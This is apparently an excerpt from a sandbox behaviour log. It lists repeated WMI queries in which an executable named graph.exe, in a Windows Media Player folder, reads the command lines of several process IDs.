Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8028
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8028
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
